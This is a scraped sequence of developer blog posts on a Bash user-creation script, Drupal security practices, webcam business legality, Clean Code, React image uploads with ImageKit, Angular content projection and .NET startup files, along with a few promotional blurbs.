may produce projects and connect with people. [Click on this link for Intenship](https://hng.tech/internship) or [Click on this link to Connect](https://hng.tech/hire)
nicholchuks
1,908,752
Automating User Creation and Management with a Bash Script
As a SysOps engineer, automating user creation and management is essential for maintaining system...
0
2024-07-02T13:56:51
https://dev.to/powei_erewejoh_1b18d805c2/automating-user-creation-and-management-with-a-bash-script-2ib2
As a SysOps engineer, automating user creation and management is essential for maintaining system efficiency and security, especially when onboarding new developers. This article presents a robust Bash script to read a text file with usernames and group names, create the necessary users and groups, set up home directories, generate random passwords, and log all actions. This task was given as part of HNG internship program - more info at [hng internship](https://hng.tech/internship) Find and hire elite freelance talent at https://hng.tech/hire ## Script Overview The script, create_users.sh, performs the following tasks: 1. Read a text file with user and group information. 2. Create users and groups based on the information. 3. Set up home directories with appropriate permissions. 4. Generate random passwords for each user. 5. Log actions to /var/log/user_management.log. 6. Store passwords securely in /var/secure/user_passwords.txt. ## Script Breakdown **1. Setting Up Log and Password Files** We start by defining the paths for the log and password files: ``` LOG_FILE="/var/log/user_management.log" PASSWORD_FILE="/var/secure/user_passwords.txt" ``` The **setup_files** function ensures these files and directories exist with the correct permissions: ``` setup_files() { if [ ! -d "/var/log" ]; then mkdir -p "/var/log" fi if [ ! -f "$LOG_FILE" ]; then touch "$LOG_FILE" chmod 644 "$LOG_FILE" fi if [ ! -d "/var/secure" ]; then mkdir -p "/var/secure" fi if [ ! -f "$PASSWORD_FILE" ]; then touch "$PASSWORD_FILE" chmod 600 "$PASSWORD_FILE" fi } ``` **2. Generating Random Passwords** The **generate_password** function uses OpenSSL to generate a random password: ``` generate_password() { local password=$(openssl rand -base64 12) echo "$password" } ``` **3. Logging Actions** The **log_action** function logs messages to the log file with timestamps: ``` log_action() { local message="$1" echo "$(date +'%Y-%m-%d %H:%M:%S') - $message" >> "$LOG_FILE" } ``` **4. Processing the User File** The script processes the user file provided as an argument. It reads each line, splits the username and groups, and creates the necessary users and groups: ``` USER_FILE="$1" if [ ! -f "$USER_FILE" ]; then echo "User file not found!" exit 1 fi setup_files while IFS=';' read -r username groups; do username=$(echo "$username" | xargs) groups=$(echo "$groups" | xargs) if [ -z "$username" ]; then continue fi if id "$username" &>/dev/null; then log_action "User $username already exists. Skipping creation." else if ! getent group "$username" &>/dev/null; then groupadd "$username" log_action "Created group $username." fi useradd -m -g "$username" "$username" log_action "Created user $username with personal group $username." password=$(generate_password) echo "$username:$password" | chpasswd log_action "Set password for user $username." echo "$username:$password" >> "$PASSWORD_FILE" fi if [ -n "$groups" ]; then IFS=',' read -ra group_array <<< "$groups" for group in "${group_array[@]}"; do group=$(echo "$group" | xargs) if ! getent group "$group" &>/dev/null; then groupadd "$group" log_action "Created group $group." fi usermod -aG "$group" "$username" log_action "Added user $username to group $group." done fi chmod 700 "/home/$username" chown "$username:$username" "/home/$username" log_action "Set permissions for /home/$username." done < "$USER_FILE" log_action "User creation and configuration completed." ``` **Using the Script** * Save the Script: Save the script as **create_users.sh**. * Make the Script Executable: ``` chmod u+x create_users.sh ``` * Prepare the User File: Create a text file (e.g., users.txt) with the following format: ``` light; sudo,dev,www-data idimma; sudo mayowa; dev,www-data ``` * Run the Script: ``` sudo ./create_users.sh users.txt ``` **Explanation of the Script** 1. **Setup Files**: The script first ensures that the log file and secure password file exist and have the appropriate permissions. 2. **Read and Process User File**: It reads the user file line by line, processes each username and associated groups, and handles the creation or modification of users and groups. 3. **Error Handling**: The script checks if users or groups already exist and skips creation if they do, logging the actions appropriately. 4. **Security**: Random passwords are generated for each user and stored securely. Permissions for home directories and the password file ensure security and privacy. 5. **Logging:** All actions are logged to /var/log/user_management.log with timestamps for easy auditing and troubleshooting. ### Conclusion This script automates the tedious task of user creation and management, ensuring consistency and security across your systems. By logging all actions and securely storing passwords, it provides a reliable way to onboard new developers and manage user accounts efficiently.
powei_erewejoh_1b18d805c2
1,909,018
What are the security best practices you follow when developing a Drupal website?
Ensuring the security of a Drupal website is paramount given the frequent cyber threats and...
0
2024-07-02T13:55:32
https://dev.to/chariesdevil/what-are-the-security-best-practices-you-follow-when-developing-a-drupal-website-1i52
drupal, website, development, hire
Ensuring the security of a Drupal website is paramount given the frequent cyber threats and vulnerabilities that can affect web applications. Following best practices in Drupal development helps protect the site, its data, and its users. **Here are the key security best practices for developing a secure Drupal website:** ## 1. Stay Updated One of the simplest yet most effective security measures is keeping your Drupal core, contributed modules, and themes up to date. The Drupal community frequently releases security updates to address vulnerabilities. Staying updated minimizes the risk of exploiting known security issues. **How to Stay Updated:** Regularly check the official Drupal security advisories. Use tools like Drush or Composer to update your Drupal installation. Subscribe to security mailing lists for timely notifications. ## 2. Use Trusted Modules Only use modules and themes from trusted sources. Modules from the official Drupal repository are reviewed and monitored by the community, reducing the risk of introducing vulnerabilities. **Best Practices for Module Selection:** Review the module's usage statistics and community feedback. Ensure the module is actively maintained and updated. Avoid using custom modules unless absolutely necessary, and ensure they are coded securely. ## 3. Implement Strong User Authentication Secure authentication mechanisms are crucial to prevent unauthorized access. **Recommendations:** Enforce strong password policies (e.g., minimum length, complexity requirements). Enable two-factor authentication (2FA) for added security. Use CAPTCHA or reCAPTCHA to prevent automated brute-force attacks. Limit the number of login attempts to prevent brute-force attacks. ## 4. Manage User Roles and Permissions Carefully Drupal’s role-based access control (RBAC) system allows you to assign specific permissions to different user roles. Properly configuring these permissions is essential for security. **Tips for Managing Permissions:** Follow the principle of least privilege: only grant permissions that are necessary for each role. Regularly audit roles and permissions to ensure they are correctly configured. Use modules like RoleAudit to review and manage permissions. ## 5. Secure the Database The database is a critical component of a Drupal site, containing all the content and user information. **Database Security Measures:** Use strong, unique passwords for database access. Restrict database access to only necessary users. Regularly back up the database and ensure backups are securely stored. Use database encryption for sensitive data. ## 6. Protect Against Cross-Site Scripting (XSS) XSS attacks involve injecting malicious scripts into web pages viewed by other users. Drupal provides mechanisms to sanitize and escape user input, but developers must use them correctly. **XSS Prevention Strategies:** Use Drupal’s built-in functions like check_plain(), check_markup(), and filter_xss(). Validate and sanitize user inputs before displaying them. Use Content Security Policy (CSP) headers to limit the sources from which scripts can be loaded. ## 7. Prevent Cross-Site Request Forgery (CSRF) CSRF attacks trick users into performing actions on a site they are authenticated to without their knowledge. **CSRF Mitigation Techniques:** Use Drupal’s Form API, which includes built-in CSRF protection. Ensure that state-changing operations (e.g., form submissions) include unique tokens. 8. Secure File Uploads File uploads can be a major security risk if not properly managed, allowing attackers to upload malicious files. File Upload Security Tips: Restrict allowed file types and validate the file extensions. Store uploaded files outside the web root to prevent direct access. Scan uploaded files for malware. Use modules like FileField Sources to handle file uploads securely. ## 9. Use Secure Connections Encrypting data transmitted between the client and the server protects against eavesdropping and man-in-the-middle attacks. **Secure Connection Practices:** Use HTTPS to encrypt data in transit. Implement HTTP Strict Transport Security (HSTS) to enforce HTTPS. Regularly renew and update SSL/TLS certificates. ## 10. Regular Security Audits and Testing Conducting regular security audits and testing helps identify and mitigate potential vulnerabilities. **Security Testing Methods:** Perform regular vulnerability scans using tools like OWASP ZAP. Conduct penetration testing to simulate real-world attack scenarios. Review code for security issues, either manually or using automated tools. ## 11. Implement Security Headers HTTP security headers add an additional layer of security to the website. **Important Security Headers:** Content Security Policy (CSP): Prevents XSS attacks by controlling resources the browser is allowed to load. X-Content-Type-Options: Prevents MIME type sniffing. X-Frame-Options: Prevents clickjacking by controlling whether the site can be framed. Strict-Transport-Security (HSTS): Enforces secure (HTTPS) connections to the server. **12. Monitor and Log Activity** Monitoring and logging user activity can help detect and respond to suspicious behavior. **Monitoring Best Practices:** Enable logging to track user actions and system events. Use monitoring tools to alert on unusual activities. Regularly review logs for signs of security incidents. ## 13. Educate and Train Your Team Security is a shared responsibility. Ensuring that your team understands and follows security best practices is crucial. **Training Tips:** Conduct regular security training sessions. Encourage developers to stay informed about the latest security threats and best practices. Foster a security-first culture within your organization. ## Conclusion By following these security best practices, you can significantly reduce the risk of security breaches and ensure that your [Drupal website development](https://devtechnosys.ae/drupal-development) remains secure. Regular updates, careful management of user permissions, secure coding practices, and continuous monitoring are key to maintaining a robust security posture. Security is an ongoing process, and staying vigilant is essential in protecting your site and its users from evolving threats.
chariesdevil
1,909,017
Is Operating a Adult Webcam Business Legal?
In recent years, the adult webcam industry has seen substantial growth, offering lucrative...
0
2024-07-02T13:53:32
https://dev.to/scarlettevans09/is-operating-a-adult-webcam-business-legal-13i
In recent years, the adult webcam industry has seen substantial growth, offering lucrative opportunities for entrepreneurs interested in online entertainment. However, the legality and complexities surrounding operating a webcam business can vary widely depending on jurisdiction and compliance with legal regulations. ## Understanding the Adult Webcam Industry The adult webcam industry revolves around live streaming platforms where performers engage with viewers in real-time. These platforms cater to a diverse audience seeking interactive and personalized adult content. From solo performances to group sessions, the range of services offered is vast, contributing to the industry's popularity and profitability. ## Legal Considerations Before diving into [adult webcam website development](https://adultwebdevelopment.dev/service/adult-webcam-website-development-services/), it's crucial to understand the legal landscape. Laws governing adult entertainment vary significantly between countries and even states or provinces within larger nations. Key legal considerations include: **i. Age Verification:** Strict protocols are often mandated to ensure performers and viewers are of legal age. **ii. Content Regulations:** Guidelines dictate what can and cannot be shown, often requiring adherence to obscenity laws. **iii. Payment Processing:** Ensuring compliance with financial regulations and safeguarding against fraudulent activities. **iv. Privacy and Data Protection:** Upholding user privacy rights and securing sensitive information. ## Steps to Develop an Adult Webcam Website Developing a successful adult webcam website involves meticulous planning and adherence to legal and technical requirements: ### 1. Market Research and Planning **i. Identify Target Audience:** Understanding demographics and preferences is crucial. **ii. Competitive Analysis:** Analyze existing platforms to identify gaps and opportunities. ### 2. Legal Compliance **i. Consult Legal Experts:** Navigate local laws and regulations to ensure compliance. **ii. Obtain Necessary Licenses:** Secure permits and licenses required for adult entertainment operations. ### 3. Technical Development **i. Choose a Reliable Development Team:** Partner with experienced developers familiar with adult webcam site requirements. **ii. Platform Features:** Implement essential features like live streaming, chat functionalities, payment gateways, and security protocols. **iii. User Experience (UX) Design:** Create an intuitive interface that enhances user engagement and navigation. ### 4. Monetization Strategies **i. Subscription Models:** Offer premium memberships for exclusive content and features. **ii. Tip-Based Interactions:** Enable viewers to tip performers during live sessions. **iii. Advertising Revenue:** Explore opportunities for targeted advertising partnerships. ### 5. Marketing and Launch **i. SEO and Digital Marketing:** Optimize for search engines and leverage social media to attract users. **ii. Launch Strategy:** Plan a phased rollout, gather feedback, and iterate based on user insights. ## Cost Considerations The cost of developing an adult webcam website can vary based on factors such as: **i. Technical Complexity:** Advanced features like high-quality streaming and real-time interactions increase development costs. **ii. Legal and Compliance Expenses:** Legal consultations, obtaining licenses, and ensuring regulatory compliance add to initial investments. **iii. Marketing and Maintenance:** Budget for ongoing marketing efforts and platform maintenance to sustain growth and engagement. ## Conclusion Operating a webcam business can be legally viable and financially rewarding with careful planning, compliance with regulations, and strategic development. By understanding the legal framework, investing in robust technical solutions, and implementing effective monetization strategies, entrepreneurs can navigate the complexities of the adult webcam industry while maximizing opportunities for success. Whether embarking on a new venture or expanding an existing portfolio, the adult webcam sector offers a dynamic space for innovation and profitability in the digital entertainment landscape.
scarlettevans09
1,909,016
-Event delegation, Event propagtion, Bubling, Capturing
Stop Propagation -
0
2024-07-02T13:53:14
https://dev.to/husniddin6939/-event-delegation-event-propagtion-bubling-capturing-mf3
1. Stop Propagation -
husniddin6939
1,909,009
Things to Expect from a System
Every System out there which serves a purpose, have all this. Leaders are those, who actively...
0
2024-07-02T13:52:06
https://dev.to/paihari/things-to-expect-from-a-system-590c
nfr, systemofrecords, systemofengagement
Every System out there which serves a purpose, have all this. Leaders are those, who actively identify, adapt and even change before the due time. **Performance:** The speed at which a system operates and processes data, including response time, throughput, and latency. **Reliability:**The ability of a system to operate consistently and accurately over time without failures. **Availability:** The degree to which a system is operational and accessible when required for use, often expressed as a percentage of uptime. **Scalability:** The capacity of a system to handle increased load or expand to accommodate growth without compromising performance. **Security:** The protection of a system against unauthorized access, data breaches, and other vulnerabilities. This includes aspects like authentication, authorization, encryption, and auditing. **Maintainability:** The ease with which a system can be maintained, including aspects of code readability, modularity, and documentation. **Usability:** The ease with which users can interact with a system, including interface design, accessibility, and user experience. **Portability:** The ability of a system to operate on different platforms or environments with minimal modifications. **Interoperability:** The capability of a system to interact and communicate effectively with other systems. **Compliance:** Adherence to laws, regulations, guidelines, and specifications relevant to the industry or domain. **Flexibility:** The ease with which a system can adapt to changes in requirements or environments. **Efficiency:** The optimal use of resources by a system, including processing power, memory, and bandwidth. **Auditability:** The ability to trace system activities and operations to support auditing and compliance requirements. **Recovery:** The ability of a system to recover from failures, including backup, failover, and disaster recovery mechanisms. **Localization:** The ability of a system to support different languages, regional settings, and cultural expectations.
paihari
1,909,014
How Much Does AI Cost? Exploring Pricing Factors and Implementation Types
AI has revolutionized the world, promising giant breakthroughs everywhere. Many businesses dream of...
0
2024-07-02T13:51:06
https://dev.to/devler_io/how-much-does-ai-cost-exploring-pricing-factors-and-implementation-types-e8f
webdev, ai
AI has revolutionized the world, promising giant breakthroughs everywhere. Many businesses dream of repeating the success of #ChatGPT, 🧐 but there is one simple question to answer: What’s the price, and is the game worth a candle? 🤔 You may be surprised that simple #AI models cost as little as $5,000. It’s not such a heavy price tag. Read our article, which is packed with figures and insights, and learn: 🟢 Factors influencing AI cost 🟢 Implementation types and their costs 🟢 Additional cost considerations 👉 Read and find out how much your #project costs. Devler.io will also help you find the right specialists for implementation. 👉 [Read article](https://devler.io/blog/how-much-does-ai-cost?slug=how-much-does-ai-cost)
devler_io
1,907,492
Data Organisation: Ensuring data quality in backend systems
When it comes to backend development, one of the biggest challenges we face is managing the issues...
0
2024-07-02T13:46:57
https://dev.to/blessingtutka/data-organisation-ensuring-data-quality-in-backend-systems-380b
backend, data, database, performance
When it comes to backend development, one of the biggest challenges we face is managing the issues that arise from disorganized data. In the world of backend development, data is king. It's the fuel that powers our applications, providing the information that drives the user experience. This data before it becomes the quality output our users can easily interact with must be carefully handled. One of the main roles of a backend developer is data processing which involves building and maintaining the mechanisms that process data and perform actions on websites. **Challenge**: Ensuring data quality in backend systems. Disorganized data, characterized by inconsistencies, missing values, and incorrect formats, can significantly impact application performance and user experience. ## What is back-end development? Back-end development means working on server-side software, which focuses on everything you can’t see on a website page. This work is done by backend developers who use code that helps browsers or any other application communicate with servers (computers or software programs/applications that provide services or resources to other computers or applications) or/and with databases(organized collection of data). ## The Importance of Data Quality Poorly organized and inconsistent data can lead to a cascade of problems: - **Bugs and Errors**: Inconsistent data can cause unexpected errors and crashes in applications, leading to a bad user experience. - **Inaccurate Insights**: If data is unreliable, the insights we derive from it will also be unreliable. - **Security Risks**: Unstructured data can create vulnerabilities, making systems more susceptible to security breaches. - **Wasted Time and Resources**: Cleaning and organizing data takes time and resources. You solve problems that you wouldn't have to solve if your data were organized. - **Poor Performance**: Disorganized data can degrade application performance, resulting in a negative user experience. Investing in data organization provides numerous benefits: - **Improved Application Performance**: Clean and well-organized data leads to faster and more efficient data processing, resulting in a smoother user experience. - **Enhanced Data Accuracy**: Data validation and cleaning ensure data accuracy, leading to more reliable insights. - **Increased Security**: Organized data makes it easier to implement security measures and protect sensitive information. - **Reduced Development Costs**: By eliminating data-related issues, you can reduce development time and costs associated with debugging and fixing errors. ## Ensuring data quality with well-organized data? Maintaining well-organized data is one of the keys to ensuring high data quality in backend systems. One of the most used tools to organize and store your data is a **database management system** (**DBMS**). The are many DBMSs out there each with its pros and cons to have more info you can read this [DBMS comparison article]("https://www.altexsoft.com/blog/comparing-database-management-systems-mysql-postgresql-mssql-server-mongodb-elasticsearch-and-others/"). Here are some tips to well organizing your data for ensuring data quality in backend system: - **Data Normalization**: Use database normalization techniques to reduce data redundancy and improve data consistency. To have more info you can read this [data normalization blog]("https://www.splunk.com/en_us/blog/learn/data-normalization.html") - **Efficient Data Storage**: Use appropriate database management systems (DBMS) according to your needs. - **Data Validation**: Implement validation rules to enforce data integrity. This includes type checking, range checks, and format validation. - **Data Cleaning**: Develop routines to identify and correct errors in data, such as missing values, duplicate entries, and inconsistent formats. - **Data Transformation**: Convert data into a format that is suitable for your specific application and use case. - **Data Governance**: Establish clear policies and procedures for data management, including access control, data retention, and data security. ## My first Experience with backend development For my final year project in computer science, I chose to learn Python and Django, a web development framework for backend applications. I started learning these new technologies six months before the deadline while also taking my degree courses. This self-learning helped me complete my project in three months. I faced many challenges, one of them was transforming facts and problems into computerized and organized data accessible through digital technologies, such as websites, as this was my first practical project. My final year project, an attendance management system, required research and practice. I overcame these difficulties by reading articles and books, following tutorials, and engaging in practical projects and exercises. ## Expectations for HNG Internship As a participant in the HNG internship program, I'm looking forward to improving my backend development skills, collaborating with skilled developers, and contributing to exciting projects. This internship provides a valuable platform to assimilate industry best practices from seasoned professionals and apply them to practical projects. I'm looking forward to working with you and creating innovative solutions together. If you’re interested in learning more about the HNG Internship, check out these links: - [HNG Internship]("https://hng.tech/internship") - [HNG Hire]("https://hng.tech/hire") That's a wrap!; we've come to the end. There's so much more, but we've covered the essential key points about ensuring data quality. It's up to you to continue your research. If you have any questions or suggestions feel free to drop a comment below. We're all in this together to learn and grow! SURPASS YOUR LIMITS 😎😎 THANKS, AND GOOD LUCK 😊💪
blessingtutka
1,909,011
Effortless Image Uploads in React Using ImageKit
It's good Imagekit is an amazing and easy-to-use tool that streamlines the process...
0
2024-07-02T13:46:28
https://dev.to/leg_end/effortless-image-uploads-in-react-using-imagekit-hoh
javascript, webdev, softwaredevelopment, programming
## It's good [Imagekit](https://imagekit.io/) is an amazing and easy-to-use tool that streamlines the process of: 1. Managing both videos and images 2. Work with various storage locations 3. Manipulate digital assets ## In React project [Integrating ImageKit](https://imagekit.io/docs/integration/react#setup-imagekit-react-sdk) into a react project is quite straightforward. The project required storing the images uploaded by users in a media gallery. ### Installation First, install the SDK: `npm i imagekitio-react` ### Initialization parameters Create an account. You'll find the _Default url endpoint, public key and private key_ on your dashboard. ![IKUpload compnent](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/35bovrcdorjqpxikdt9s.png) ### Authentication function The `authenticator` function fetches security parameters from backend, completing the setup process. ### Backend setup The project required [uploading files](https://imagekit.io/docs/integration/react#uploading-files-in-react) from React. To handle image uploads, first step is to set up the backend using Express and install the dependency needed. `npm i imagekit express` ## Configuring ImageKit Now, the 3 paramters obtained earlier (_URL endpoint, public key and private key_) are used to get the security params: _token, expire, signature_. ![Backend app setup](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t9lyolvc16y041v3bymm.png) ## Fetching auth params The route defined above fetches the auth parameters which are used by frontend. With the backend app running, authenticate and upload images in React app. The component: ![The input file upload component](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lmilxkvkamfgw2m9qdxk.png) Notice the 2 functions for handling error and success. Also, the props id (for identifying the respective label) and multiple (to ensure users can add multiple files) help defining the input wherever the component is used. ## So... Integrating ImageKit in the app simplified image management, providing a seamless experience for both developers and users. With this setup, handling image uploads, optimizing delivery, and applying real-time transformations got easier.
leg_end
1,909,010
Waakif Technologies Private Limited
Waakif Technologies Private Limited: Unleash the Power of AI to Transform Your Customer...
0
2024-07-02T13:45:13
https://dev.to/waakif/waakif-technologies-private-limited-1145
ai, digitalworkplace
**[Waakif Technologies Private Limited](https://www.waakif.com/)**: Unleash the Power of AI to Transform Your Customer Experience Transform customer churn into explosive growth. Waakif, your AI-powered business partner, empowers you to skyrocket retention and triple customer engagement. Through intelligent automation, Waakif personalizes interactions, fostering deeper connections and unwavering loyalty. Go beyond data; gain actionable intelligence. Our platform harnesses the power of AI to unlock valuable insights hidden within your customer data. Optimize marketing campaigns, personalize offerings with laser precision, and even predict customer needs – all with Waakif's intelligent guidance. Tailored for your success, not a one-size-fits-all solution. Waakif boasts advanced customization, allowing you to seamlessly integrate the platform into your existing workflows and adapt it to your specific business goals. Whether you're a nimble startup or a well-established enterprise, Waakif becomes a powerful tool on your unique path to success. Gain a competitive edge through data-driven decision making. Waakif empowers you to deliver exceptional customer experiences that keep them coming back for more. Combined with the insights gleaned from AI, you'll have the tools necessary to surpass your competitors and become an industry leader. Waakif is the key to unlocking explosive customer retention, optimizing your marketing efforts, and propelling your business to the forefront of the market. ## CONTACT US: Email: support@waakif.com Contact: +91- 9161630891 Communication: Waakif Technologies Private Limited (Ashiyana) 5 Nehrunagar Raiya Road, Rajkot GJ - 360007 (India)
waakif
1,909,006
Bar Programming #03 — Clean Code Chapter 1
In the today post, I will write a resume of what I learn and understood about the first chapter of...
0
2024-07-02T13:41:22
https://dev.to/samoht/bar-programming-03-clean-code-chapter-1-39d6
beginners, learning
In the today post, I will write a resume of what I learn and understood about the first chapter of “Clean Code”, probably I will write more texts like this about the other chapters. So, if you have interest in Clean Code or want to understand a little about, you are more than welcome to continue reading this possible series. The Clean Code book was written by Robert Cecil Martin, aka Uncle Bob, in this book he covers technics, rules, and ideas. Which aim to improve the readability of codes and to improve the efficiency of the development. In the first chapter, the following topics are covered: - What is a Bad Code? - Which is the cost of have a bad code? - What is Clean Code? - Recommendations ## What is a Bad Code? To explain the importance of a good code, the Uncle Bob quotes an example of an application developed in the 80s, that became some popular. But, interval between the updates start to increase, the bugs were not fixed, and the time of loading and crashes start to increase so much. Until it reaches a point, it was unusable. After a time, he meet one of the workers, and found that the reason behind this chaos, it was as expected. The code start to became incomprehensible, more and more makeshift, so that it was not possible to update or do maintenance. ## Why we write a bad code? But, why? Why we write a bad code? The bad code has power to retard us, a good possible reason can be the hurry, because, we have deadlines to finish our tasks, the demands need to be completed, we can't lose our time cleaning the code. Or same, the wear and tear of working in that project is turning big, to the point what we want just end this once and for all, and throw it aside. ## The cost of having a bad code We can see the cost of having a bad code, when we read someone else's code, and the fact that it is confusing, makes us work more slowly, or same, our own code can produce the same effect. Even when we start fast, we can suddenly to perceive that we are more and more delaying to achieve progress. This happens, because these errors are like a snowball, the more we leave aside, the more we postpone the cleaning time, the slower it will our progress. According to the author, these bugs make the team productivity get closer to zero. Therewith in mind, the author says that even if we think “I need to fulfill the demand, if not I will be fired”, we need to communicate to our superiors, and to warn that such a demand need more time. We need to protect our code, we need to defend that it requires more attention, so that so, don't happen the same thing that happen with the press before mentioned. ## What is Clean Code? Let's say you believed in me, that a bad code is an obstacle for the creation of a software, and think you want to develop a good code, so, how to write a clean code? It should be noted that write a clean code, is not as simple as flipping a switch in our heads, is necessary to have a sensitivity in relation to the code. Understand which are the things that are turning our code in a bad code, and which technics can be applied to resolve. Write a clean code is like to draw, be able to evaluate if a drawing is good or not, don't make you able to draw, so, is necessary to have knowledge of technics and strategies. So, going to the main question, we can summarize a clean code in a code that follows that four rules: - **Without duplication**, do not exist any repeated features. - **One task**, the code must have only one function, and your functions too, everything must do only one thing. - **Expressiveness**, the code must be very clear in relation with the name of the things. - **Little abstractions**, this rule involves the creation of methods and classes that encapsulate specific features in a clear way, without becoming excessively complex or multifunctional. In general, we can describe a clean code, paraphrasing Ward Cunningham: > A clean code, he makes exactly what you think, is like if the language was be made for make that thing, nothing surprise you, everything is how you expected. ## Recommendations Of course, the rules to make a clean code can vary too much, don't exist only the rules mentioned in the “Clean Code” book, because, this is the author vision. Of course, his vision is supported and used for many people, but still, not all will think that this is the better way to make a clean code. But the author recommends, that we read it, learn with him and decide for ourselves. So, he says that for him and your colleagues, these rules are the best, but, don't recommend that we think in this way, because it is possible that we can reject one or other rule. Uncle Bob also says to us, that we have the responsibility to write a code that is easy to read, in the end, while we write a code, a good part of the job is read another codes. When we are reading, we want this reading to be easy to understand. So, we need to write a code thinks that someone will read it, aiming to write something that is easy for other people to read. Finally, the Uncle Bob also say, to us follow boy scout rule: > Make the area of camp better that when you find it. The idea behind this recommendation, is that instead of we only write a clean code, we must do maintenance. In other words, we must constantly think in clean improvements to our code, and this doesn't need to be a big thing, change a name of a variable is enough. ## Conclusion With this, we can understand the need and importance to have a clean code, besides understanding what is a clean code. In the next chapter, we will understand how we can give better names to our children (variables and functions).
samoht
1,909,005
Cleaning Fairies VA Expert Cleaning Services in North Virginia.
A clean home is a happy home! Cleaning Fairies provides top-rated cleaning services across Virginia,...
0
2024-07-02T13:40:54
https://dev.to/cleaningfairiesva/cleaning-fairies-va-expert-cleaning-services-in-north-virginia-42gb
cleaning, cleaningfairiesva, cleaningservices, northvirginia
A clean home is a happy home! Cleaning Fairies provides top-rated cleaning services across Virginia, including home cleaning services, residential cleaning, move-out cleaning, and commercial cleaning. We take the stress out of keeping your space spotless so you can focus on what matters most. Get a free quote today.
cleaningfairiesva
1,909,002
Content Projection Fallback in ng-content in Angular
Introduction In this blog post, I want to describe a new Angular 18 feature called content...
27,826
2024-07-02T13:38:46
https://www.blueskyconnie.com/content-projection-fallback-with-ng-content-in-angular-18/
angular, tutorial
##Introduction In this blog post, I want to describe a new Angular 18 feature called content projection fallback in ng-content. When content exists between the ng-content opening and closing tags, it becomes the fallback value. When projection does not occur, the fallback value is displayed. ###Bootstrap Application ```typescript // app.config.ts export const appConfig: ApplicationConfig = { providers: [ provideExperimentalZonelessChangeDetection() ] }; ``` ```typescript // main.ts import { appConfig } from './app.config'; bootstrapApplication(App, appConfig); ``` Bootstrap the component and the application configuration to start the Angular application. ###Create a Card Component The `AppCard` component displays the default tier and its default features. Then, an `AppPricingListComponent` encapsulates the `AppCardComponent` and passes the custom tier and features to it to display. Finally, the App component consists of `AppCardComponent` and `AppPricingListComponent` to build the full pricing page. ```typescript // app-card.component.ts import { ChangeDetectionStrategy, Component } from "@angular/core"; @Component({ selector: 'app-card', standalone: true, template: ` <div class="header"> <ng-content select="[header]">Free Tier</ng-content> </div> <div class="content"> <ng-content> <ul> <li>Free of Charge</li> <li>1 License</li> <li>500MBs Storage</li> <li>No Support</li> </ul> </ng-content> </div> <div class="footer"> <ng-content select="[footer]"> <button>Upgrade</button> </ng-content> </div> `, changeDetection: ChangeDetectionStrategy.OnPush, }) export class AppCardComponent {} ``` The template of the `AppCardComponent` has three sections: header, content, and footer. The header section consists of a `ng-content` that projects to an element with a header attribute. When the projection does not occur, the fallback value, "Free Tier", is displayed. The content section comprises a `ng-content` element that projects to the default element. This section renders the free tier's features when the projection does not occur. The footer section comprises a `ng-content` element that projects to an element with a footer attribute. When the projection does not occur, the upgrade button is rendered. ###Create a Price Listing Component This is a simple component that encapsulates `AppCardComponent` to display the signal input values of a tier and its features. ```typescript // app-price-list.component.ts import { ChangeDetectionStrategy, Component, input } from "@angular/core"; import { AppCardComponent } from "./app-card.component"; @Component({ selector: 'app-price-card', standalone: true, imports: [AppCardComponent], template: ` <section> <h2>Custom Content</h2> <app-card> <div header>{{ tier() }}</div> <ul> @for (item of features(); track item) { <li>{{ item }}</li> } </ul> </app-card> </section> `, changeDetection: ChangeDetectionStrategy.OnPush, }) export class AppPricingListComponent { tier = input<string>(''); features = input<string[]>([]); } ``` ###Build a full pricing page using content projection fallback ```typescript // main.ts import { Component, VERSION } from '@angular/core'; import { AppCardComponent } from './app-card.component'; import { AppPricingListComponent } from './app-price-list.component'; @Component({ selector: 'app-root', standalone: true, imports: [AppCardComponent, AppPricingListComponent], template: ` <header>Angular {{version}} - Content Projection fallback </header> <main> <section> <h2>Fallback content</h2> <app-card /> </section> <app-price-list tier="Start-up" [features]="startUpFeatures" /> <app-price-list tier="Company" [features]="companyFeatures" /> <section> <h2>Custom Content</h2> <app-card> <div header>Enterprise</div> <ul> <li>Contact sales for quotation</li> <li>200+ Licenses</li> <li>1TB Storage</li> <li>Email and Phone Technical Support</li> <li>99.99% Uptime</li> </ul> <div footer>&nbsp;</div> </app-card> </section> </main> `, }) export class App { version = VERSION.full; startUpFeatures = [ 'USD 10/month', '3 Licenses', '1GB Storage', 'Email Technical Support', ]; companyFeatures = [ 'USD 100/month', '50 Licenses', '20GB Storage', 'Email and Phone Technical Support', '95% Uptime' ]; } ``` The pricing page has four cards: the free tier card displays the fallback values because the `AppCardComponent` does not have a body. The startup and company cards use the footer's fallback value and project the header and features. Therefore, both cards still display the upgrade button. Similarly, the enterprise card projects the header and features. It also projects the footer to replace the upgrade button with a blank row. The following Stackblitz repo displays the final results: {%embed https://stackblitz.com/edit/angular-content-projection-fallback-qh5hcd?file=src%2Fmain.ts %} This is the end of the blog post that describes content projection fallback with ng-content in Angular 18. I hope you like the content and continue to follow my learning experience in Angular, NestJS, GenerativeAI, and other technologies. ##Resources: - Stackblitz Demo: https://stackblitz.com/edit/angular-content-projection-fallback-qh5hcd?file=src%2Fmain.ts - Github Repo: https://github.com/railsstudent/ng-content-projection-default-demo - Github Page: https://railsstudent.github.io/ng-content-projection-default-demo/
railsstudent
1,897,279
Merging Startup.cs and Program.cs in .NET 8: A Simplified Approach
As .NET evolves, so does the way we structure our applications. One notable change introduced in...
0
2024-07-02T13:38:05
https://www.webscope.io/blog/merging-startup.cs-and-program.cs-in-.net-8-a-simp
As .NET evolves, so does the way we structure our applications. One notable change introduced in recent versions of .NET is the ability to merge `Startup.cs` and `Program.cs` into a single file. This approach streamlines the setup process, making it more cohesive and manageable. This article will discuss the rationale behind merging these files, walk through the process, and highlight potential advantages and pitfalls. ## Why Merge Startup.cs and Program.cs? Okay, first let me try to find some advantages and also why it can be a bad idea. ### Advantages 1. **Simplified Structure**: By consolidating `Startup.cs` and `Program.cs`, you create a single entry point for application configuration. This can make the codebase more straightforward to navigate and understand. Updates to configuration or middleware can be made in one file rather than spread across multiple files, reducing the likelihood of inconsistencies and errors. 2. **Improved Testability**: With all configurations in one place, writing integration tests becomes simpler. Conditions and configurations are centralized, making it easier to mock dependencies and test different scenarios. ### Potential Pitfalls 1. **Complexity in Large Applications**: For very large applications, having all configurations in one file might become unwieldy. It's essential to balance simplicity with readability. 2. **Migration Challenges**: If you're transitioning an existing application, merging these files might introduce bugs if not done carefully. A rollback could be a nightmare (speaking from experience!). ## 